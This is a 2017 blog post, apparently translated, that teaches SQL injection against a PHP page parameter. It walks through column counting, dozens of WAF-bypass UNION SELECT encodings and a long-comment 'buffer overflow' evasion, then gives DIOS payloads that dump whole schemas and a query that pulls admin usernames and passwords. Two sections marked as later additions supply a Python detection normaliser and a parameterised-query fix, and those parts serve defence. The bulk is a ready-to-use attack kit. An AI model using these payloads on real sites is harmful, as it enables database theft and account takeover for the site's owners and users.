// Posted by: Unknown
// On: Saturday, 28 January 2017
Good morning guys...
This time I want to show you a few tricks for SQL Injection - Buffer Overflow + WAF Bypass.
As usual, we look for a target first.
Example:
http://localhost.crots/anu.php?iku=6
First we try with ' ; if the page still loads, we carry on, but sometimes it comes back forbidden.
Example:
http://localhost.crots/anu.php?iku=6' (403)
Then try the \ character instead, guys.
Example:
http://localhost.crots/anu.php?iku=6\ (success, not forbidden anymore)
Next we continue with ORDER BY.
Example:
http://localhost.crots/anu.php?iku=6+order+by+100--
or
http://localhost.crots/anu.php?iku=-6+order+by+100--
or
http://localhost.crots/anu.php?iku=6'+order+by+100--+
or
http://localhost.crots/anu.php?iku=-6'+order+by+100--+-
or
http://localhost.crots/anu.php?iku=.6+order+by+100--
Find out how many columns there are; if something gets in the way and we have to bypass the WAF, try a few of these WAF bypasses, guys:
/**/ORDER/**/BY/**/
/*!order*/+/*!by*/
/*!ORDER+BY*/
/*!50000ORDER+BY*/
/*!50000ORDER*//**//*!50000BY*/
/*!12345ORDER*/+/*!BY*/order%0a%0aby
Group+by
OK, let's continue: once we know how many columns there are,
we use UNION, bro.
Example:
http://localhost.crots/anu.php?iku=6+union+select+1,2,3--
Find out at which position the magic number (the one that shows up on the page) is; if something gets in the way and we have to bypass the WAF, try a few of these WAF bypasses, guys:
/*!50000union*//**//*!50000select*/
/*!50000%55nIoN*/+/*!50000%53eLeCt*/
/*!50000union*//**_**//*!50000select*//**_**/
%55nion(%53elect+1,2,3)--+-
+union+distinct+select+
+union+distinctROW+select+
/**//*!12345UNION+SELECT*//**/
/**//*!50000UNION+SELECT*//**/
/**/UNION/**//*!50000SELECT*//**/
/*!50000UniON+SeLeCt*/
union+/*!50000%53elect*/
+#uNiOn+#sEleCt
+#1q%0AuNiOn+all#qa%0A#%0AsEleCt
/*!%55NiOn*/+/*!%53eLEct*/
/*!u%6eion*/+/*!se%6cect*/
+un/**/ion+se/**/lect
uni%0bon+se%0blect
%2f**%2funion%2f**%2fselect
union%23foo*%2F*bar%0D%0Aselect%23foo%0D%0A
REVERSE(noinu)+REVERSE(tceles)
/*--*/union/*--*/select/*--*/
union+(/*!/**/+SeleCT+*/+1,2,3)
/*!union*/+/*!select*/
union+/*!select*/
/**/union/**/select/**/
/**/uNIon/**/sEleCt/**/
+%2F**/+Union/*!select*/
/**//*!union*//**//*!select*//**/
/*!uNIOn*/+/*!SelECt*/
uNiOn+aLl+sElEcT
UNIunionON+SELselectECT
/**/union/*!50000select*//**/
0%a0union%a0select%09
%0Aunion%0Aselect%0A
%55nion/**/%53elect
%252f%252a*/UNION%252f%252a+/SELECT%252f%252a*/
%0A%09UNION%0CSELECT%10NULL%
/*!union*//*--*//*!all*//*--*//*!select*/
union%23foo*%2F*bar%0D%0Aselect%23foo%0D%0A1%+2C2%2C
/*!20000%0d%0aunion*/+/*!20000%0d%0aSelEct*/
+UnIoN/*&a=*/SeLeCT/*&a=*/
union+sel%0bect
+uni*on+sel*ect+
++#1q%0Aunion+all#qa%0A#%0Aselect
union(select+(1),(2),(3),(4),(5))
UNION(SELECT(column)FROM(table))
%23xyz%0AUnIOn%23xyz%0ASeLecT+
%23xyz%0A%55nIOn%23xyz%0A%53eLecT+
union(select(1),2,3)
union+(select+1111,2222,3333)
uNioN+(/*!/**/+SeleCT+*/+11)
++#1q%0AuNiOn+all#qa%0A#%0AsEleCt
/**//*U*//*n*//*I*//*o*//*N*//*S*//*e*//*L*//*e*//*c*//*T*/
%0A/**//*!50000%55nIOn*//*yoyu*/all/**/%0A/*!%53eLEct*/%0A/*nnaa*/
+%23sexsexsex%0AUnIOn%23sexsexs+ex%0ASeLecT+
+union%23foo*%2F*bar%0D%0Aselect%23foo%0D%0A1%+2C2%2C
/*!f****U%0d%0aunion*/+/*!f****U%0d%0aSelEct*/
+%23blobblobblob%0aUnIOn%23blobblobblob%0aSeLe+cT+
/*!blobblobblob%0d%0aunion*/+/*!blobblobblob%0d%0aSelEct*/
/union\sselect/g
/union\s+select/i
/*!UnIoN*/SeLeCT
+uni>on+sel>ect+
+(UnIoN)+(SelECT)+
+(UnI)(oN)+(SeL)(EcT)
+'UnI"On'+'SeL"ECT'
+uni+on+sel+ect+
+/*!UnIoN*/+/*!SeLeCt*/+
uni%20union%20/*!select*/%20
union%23aa%0Aselect
/**/union/*!50000select*/
/^.*union.*$/+/^.*select.*$/
/*union*/union/*select*/select+
/*uni+X+on*/union/*sel+X+ect*/
+un/**/ion+sel/**/ect+
+UnIOn%0d%0aSeleCt%0d%0a
UNION/*&test=1*/SELECT/*&pwn=2*/
+un/**/ion+se/**/lect+
+UNunionION+SEselectLECT+
+uni%0bon+se%0blect+
%252f%252a*/union%252f%252a+/select%252f%252a*/
/%2A%2A/union/%2A%2A/select/%2A%2A/
%2f**%2funion%2f**%2fselect%2f**%2f
/*!UnIoN*/SeLecT+
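Seen from the other side of the WAF, the ORDER BY and UNION SELECT lists above are mostly variations of the same two keywords wrapped in comments, mixed case, URL encoding and unusual whitespace. The following is an added example, not from the original post: a Python normaliser for detection logic that decodes the parameter value and strips MySQL comment syntax before matching, run over constructed sample values modelled on the list. The literal `/union\s+select/i` pattern quoted in the list is used as the baseline it is compared against.

```python
"""
Added example (not from the original post): a log-side normaliser that
undoes the comment, case and URL-encoding tricks listed above before
looking for the UNION ... SELECT shape, so that a detection rule does
not depend on the literal bytes "union select" appearing in the request.
"""
import re
from urllib.parse import unquote_plus

# A literal check in the spirit of the /union\s+select/i pattern that appears
# in the list above; it only fires when the keywords are spelled out plainly.
NAIVE = re.compile(r"union\s+select", re.IGNORECASE)

# Plain block comments /* ... */ that are not MySQL "versioned" comments.
_BLOCK = re.compile(r"/\*(?!!).*?\*/", re.DOTALL)
# Versioned comments /*!50000 ... */: MySQL executes what is inside, so keep it.
_VERSIONED = re.compile(r"/\*!\d*(.*?)\*/", re.DOTALL)
# Line comments introduced by '#' or by '-- ' run to the end of the line.
_LINE = re.compile(r"(#|--(?=\s|$))[^\n]*")
# Whitespace, including the \x0b/\x0c control bytes and the \xa0 byte that
# appear in the list, all collapse to a single space.
_WS = re.compile(r"[\s\x0b\x0c\xa0]+")

# After normalisation the value reads as plain SQL. A number may sit directly
# in front of the keyword (".6e0union"), so only a letter or underscore before
# "union" rules the match out.
UNION_SELECT = re.compile(
    r"(?<![a-z_])union\b\s*(all|distinct|distinctrow)?\s*\(?\s*select\b")


def normalize(raw: str, rounds: int = 3) -> str:
    """Decode (possibly repeatedly), strip MySQL comments and odd whitespace."""
    s = raw
    for _ in range(rounds):  # %252f -> %2f -> / needs more than one pass
        decoded = unquote_plus(s, encoding="latin-1")  # keep %a0 as one byte
        if decoded == s:
            break
        s = decoded
    s = _BLOCK.sub(" ", s)
    s = _VERSIONED.sub(lambda m: " " + m.group(1) + " ", s)
    s = _LINE.sub(" ", s)
    return _WS.sub(" ", s).strip().lower()


def naive_match(raw: str) -> bool:
    return bool(NAIVE.search(raw))


def normalized_match(raw: str) -> bool:
    return bool(UNION_SELECT.search(normalize(raw)))


# Constructed sample values for the "iku" parameter, modelled on the list above.
SAMPLES = [
    "6",                                                  # benign
    "6+union+select+1,2,3--",
    "6+and+false+union+select+1,2,3--",
    "/*!50000%55nIoN*/+/*!50000%53eLeCt*/",
    "%23xyz%0AUnIOn%23xyz%0ASeLecT+",
    "union%23foo*%2F*bar%0D%0Aselect%23foo%0D%0A",
    "/**/union/**//*!50000select*//**/",
    "+#1q%0AuNiOn+all#qa%0A#%0AsEleCt",
    ".6e0union%23" + "A" * 200 + "%0Aselect+1,2,3--",   # oversized-comment form
]


def compare(samples=SAMPLES) -> list:
    """Return (sample, naive_hit, normalized_hit) for each sample value."""
    return [(s, naive_match(s), normalized_match(s)) for s in samples]


if __name__ == "__main__":
    for sample, naive, normed in compare():
        print(f"naive={naive!s:5} normalized={normed!s:5}  {sample[:60]}")
```

Run stand-alone it prints, for each sample, whether the literal pattern and the normalised check fire; the literal pattern misses every non-benign sample, including the plain `6+union+select` form, because `+` is not matched by `\s`. The normaliser is an approximation of the MySQL lexer, not a replacement for it: nested `/*!…*/` content and the `UNIunionON`-style keyword-stripping trick are outside what it handles, so it belongs alongside a parsing WAF and, above all, parameterised queries.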
But sometimes we also have to put a bypass in front of the ORDER BY, like:
and+false
and+1=1and+0
having+0
limit+2,1
div+0
is +null
^+100000000
and many more.
Example:
http://localhost.crots/anu.php?iku=6+and+false+union+select+1,2,3--
If it works there is no error anymore (for this test there are 3 columns) and the magic number shows up, but if instead the connection resets, we need the buffer overflow technique, which goes like this:
http://localhost.crots/anu.php?iku=.6e0union%23AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA%0select+1,2,3--
NB: the %23A... part is the buffer overflow, so we keep adding more A's until the site stops erroring.
OK, let's continue with printing the DB and whatever you want to print.
If you want to print your name, you can put your text in like this: 1,'inject by anu<br>',3--
Or you can also convert your HTML text to hex or binary; for hex put 0x in front of your hex, and for binary put 0b in front of your binary.
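The UNION payloads above only work because the `iku` value is pasted straight into the SQL text. The following is an added example, not from the original post, written in Python against an in-memory SQLite table (the page's PHP/MySQL endpoint is assumed to build its query by concatenation in the same way): the concatenated query sits beside the parameterised one, both fed the post's own `6 union select 1,2,3--` value.

```python
"""
Added example (not from the original post): the concatenated query that
the payloads above exploit, next to the parameterised form that closes
the hole. Uses Python's sqlite3 in memory; the original page targets a
PHP/MySQL endpoint, which is assumed to build its query the same way.
"""
import sqlite3

# Constructed sample table standing in for whatever anu.php reads by id.
CONN = sqlite3.connect(":memory:")
CONN.execute("CREATE TABLE items (id INTEGER PRIMARY KEY, name TEXT, price INTEGER)")
CONN.executemany("INSERT INTO items VALUES (?, ?, ?)",
                 [(6, "widget", 10), (7, "gadget", 20)])


def lookup_concat(iku: str) -> list:
    """Vulnerable: the raw parameter becomes part of the SQL statement text,
    so 'union select ...' is parsed as SQL and adds rows the query never meant
    to return."""
    sql = "SELECT id, name, price FROM items WHERE id = " + iku
    return CONN.execute(sql).fetchall()


def lookup_param(iku: str) -> list:
    """Hardened: the parameter is bound as a value. The database compares the
    whole string against the id column and never parses it, so the same input
    simply matches nothing."""
    sql = "SELECT id, name, price FROM items WHERE id = ?"
    return CONN.execute(sql, (iku,)).fetchall()


if __name__ == "__main__":
    payload = "6 union select 1,2,3--"   # the post's own test value, decoded
    print("concatenated, id=6           ->", lookup_concat("6"))
    print("concatenated, union payload  ->", lookup_concat(payload))
    print("parameterised, id=6          ->", lookup_param("6"))
    print("parameterised, union payload ->", lookup_param(payload))
```

With the concatenated query the payload returns the legitimate row plus the injected `(1, 2, 3)` row, which is exactly the "magic number" the post looks for; with the bound parameter the identical input returns nothing, and no amount of comment or encoding variation changes that, because the value never reaches the SQL parser.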
Here are a few cheat sheet entries for SQLi:
database() : prints the database name
user() : prints the current user
version() : prints the database version
@@hostname : prints the host/server name
and there are many more really..
And if you want to print a file (LFD style) you can use: load_file(/file.php)
If you can't be bothered doing it one by one, you can use DIOS (Dump In One Shot); here are a few DIOS you can use:
(select(@x)from(select(@x:=0x00),(select(0)from(information_schema.columns)where(table_schema=database())and(0x00)in(@x:=concat(@x,0x3c62723e,table_name,0x203a3a20,column_name))))x)
make_set(6,@:=0x0a,(select(1)from(information_schema.columns)where@:=make_set(511,@,0x3c6c693e,table_name,column_name)),@)
(select(@)from(select(@:=0x00),(select(@)from(information_schema.columns)where(@)in(@:=concat(@,0x3C62723E,table_name,0x3a,column_name))))a)
(select(select+concat(@:=0xa7,(select+count(*)from(information_schema.columns)where(@:=concat(@,0x3c6c693e,table_name,0x3a,column_name))),@)))
(Select+export_set(5,@:=0,(select+count(*)from(information_schema.columns)where@:=export_set(5,export_set(5,@,table_name,0x3c6c693e,2),column_name,0xa3a,2)),@,2))
(select+(@a)+from+(select(@a:=0x00),(@tbl:=0x00),(@tbl_sc:=0x00),(select+(@a)+from+(information_schema.columns)where+(table_schema!='information_schema')+and(0x00)in(@a:=concat(@a,0x3c62723e,if(+(@tbl!=table_name),+Concat(0x3c62723e,@tbl_sc:=table_schema,'+::',@tbl:=table_name,'+(Rows+',(select+table_rows+from+information_schema.tables+where+table_schema=@tbl_sc+and+table_name=@tbl),')',column_name),+(column_name))))))a)
and there are many more really...
Then we just look at what is inside, like viewing the admin user in the admin table, which goes like this guys:
1,concat(user,0x3a,password),3+from+admin--
NB: the aqua-coloured part is the contents of the table, while the pink part (0x3a) is the hex for : , the separator between the user and password text.
source: http://pastebin.com/XBGczDdT & https://www.youtube.com/watch?v=xeB622q8a3E
Post title: Tutorial or How to Hack With the SQL Injection - Buffer Overflow + WAF Bypass Technique